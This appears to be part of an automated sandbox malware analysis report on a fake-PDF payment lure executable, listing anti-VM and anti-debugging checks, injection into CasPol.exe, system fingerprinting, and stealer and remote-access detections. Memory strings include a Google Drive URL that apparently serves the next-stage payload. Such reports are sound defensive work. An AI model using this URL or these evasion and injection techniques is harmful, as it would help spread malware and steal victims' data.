Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: pago del 20.01.2022.PDF______________________________________.exe, 00000000.00000002.385689270.00000000031B0000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32APPDATA=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXE\SYSWOW64\MSHTML.TLBWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXE\SYSWOW64\MSHTML.TLBWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXE\SYSWOW64\MSHTML.TLBWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXE\SYSWOW64\MSHTML.TLBWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXE\SYSWOW64\MSHTML.TLBWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXE\SYSWOW64\MSHTML.TLBWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXE\SYSWOW64\MSHTML.TLB
Source: CasPol.exe, 00000011.00000002.544230735.00000000013B0000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32APPDATA=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=1BKTAGEWV-Q5KE_0MNBA_ML90CTGLRDI9
Source: pago del 20.01.2022.PDF______________________________________.exe, 00000000.00000002.385689270.00000000031B0000.00000004.00000001.sdmp, CasPol.exe, 00000011.00000002.544230735.00000000013B0000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6344 Thread sleep time: -18446744073709540s >= -30000s Jump to behavior
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Window / User API: threadDelayed 2626 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Window / User API: threadDelayed 7213 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe System information queried: ModuleInformation Jump to behavior
Source: pago del 20.01.2022.PDF______________________________________.exe, 00000000.00000002.385758535.000000000327A000.00000004.00000001.sdmp, CasPol.exe, 00000011.00000002.545355572.00000000030BA000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
Source: pago del 20.01.2022.PDF______________________________________.exe, 00000000.00000002.385758535.000000000327A000.00000004.00000001.sdmp, CasPol.exe, 00000011.00000002.545355572.00000000030BA000.00000004.00000001.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: CasPol.exe, 00000011.00000002.545355572.00000000030BA000.00000004.00000001.sdmp Binary or memory string: vmicshutdown
Source: pago del 20.01.2022.PDF______________________________________.exe, 00000000.00000002.385758535.000000000327A000.00000004.00000001.sdmp, CasPol.exe, 00000011.00000002.545355572.00000000030BA000.00000004.00000001.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: pago del 20.01.2022.PDF______________________________________.exe, 00000000.00000002.385758535.000000000327A000.00000004.00000001.sdmp, CasPol.exe, 00000011.00000002.545355572.00000000030BA000.00000004.00000001.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
Source: CasPol.exe, 00000011.00000002.544445616.0000000001639000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW`Qg
Source: pago del 20.01.2022.PDF______________________________________.exe, 00000000.00000002.385758535.000000000327A000.00000004.00000001.sdmp, CasPol.exe, 00000011.00000002.545355572.00000000030BA000.00000004.00000001.sdmp Binary or memory string: Hyper-V Time Synchronization Service
Source: CasPol.exe, 00000011.00000002.545355572.00000000030BA000.00000004.00000001.sdmp Binary or memory string: vmicvss
Source: CasPol.exe, 00000011.00000002.544557303.0000000001673000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW
Source: CasPol.exe, 00000011.00000002.544230735.00000000013B0000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32APPDATA=https://drive.google.com/uc?export=download&id=1BKTAGEWv-q5Ke_0MnBa_Ml90CTgLrdi9
Source: pago del 20.01.2022.PDF______________________________________.exe, 00000000.00000002.385689270.00000000031B0000.00000004.00000001.sdmp, CasPol.exe, 00000011.00000002.544230735.00000000013B0000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: pago del 20.01.2022.PDF______________________________________.exe, 00000000.00000002.385758535.000000000327A000.00000004.00000001.sdmp, CasPol.exe, 00000011.00000002.545355572.00000000030BA000.00000004.00000001.sdmp Binary or memory string: Hyper-V Data Exchange Service
Source: pago del 20.01.2022.PDF______________________________________.exe, 00000000.00000002.385758535.000000000327A000.00000004.00000001.sdmp, CasPol.exe, 00000011.00000002.545355572.00000000030BA000.00000004.00000001.sdmp Binary or memory string: Hyper-V Heartbeat Service
Source: pago del 20.01.2022.PDF______________________________________.exe, 00000000.00000002.385758535.000000000327A000.00000004.00000001.sdmp, CasPol.exe, 00000011.00000002.545355572.00000000030BA000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Service Interface
Source: pago del 20.01.2022.PDF______________________________________.exe, 00000000.00000002.385689270.00000000031B0000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32APPDATA=windir=\Microsoft.NET\Framework\v4.0.30319\caspol.exe\syswow64\mshtml.tlbwindir=\Microsoft.NET\Framework\v4.0.30319\caspol.exe\syswow64\mshtml.tlbwindir=\Microsoft.NET\Framework\v4.0.30319\caspol.exe\syswow64\mshtml.tlbwindir=\Microsoft.NET\Framework\v4.0.30319\caspol.exe\syswow64\mshtml.tlbwindir=\Microsoft.NET\Framework\v4.0.30319\caspol.exe\syswow64\mshtml.tlbwindir=\Microsoft.NET\Framework\v4.0.30319\caspol.exe\syswow64\mshtml.tlbwindir=\Microsoft.NET\Framework\v4.0.30319\caspol.exe\syswow64\mshtml.tlb
Source: CasPol.exe, 00000011.00000002.545355572.00000000030BA000.00000004.00000001.sdmp Binary or memory string: vmicheartbeat

Anti Debugging

barindex
Source: C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 11B0000 Jump to behavior
Source: C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe" Jump to behavior
Source: C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe" Jump to behavior
Source: C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe" Jump to behavior
Source: C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe" Jump to behavior
Source: C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe" Jump to behavior
Source: C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe" Jump to behavior
Source: C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe" Jump to behavior
Source: CasPol.exe, 00000011.00000002.545134063.0000000001C60000.00000002.00020000.sdmp Binary or memory string: Program Manager
Source: CasPol.exe, 00000011.00000002.545134063.0000000001C60000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: CasPol.exe, 00000011.00000002.545134063.0000000001C60000.00000002.00020000.sdmp Binary or memory string: Progman
Source: CasPol.exe, 00000011.00000002.545134063.0000000001C60000.00000002.00020000.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection

barindex
Source: C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information

barindex
Source: Yara match File source: 00000011.00000002.548336072.000000001E151000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 6828, type: MEMORYSTR
Source: Yara match File source: 00000011.00000002.548336072.000000001E151000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 6828, type: MEMORYSTR

Remote Access Functionality

barindex
Source: Yara match File source: 00000011.00000002.548336072.000000001E151000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 6828, type: MEMORYSTR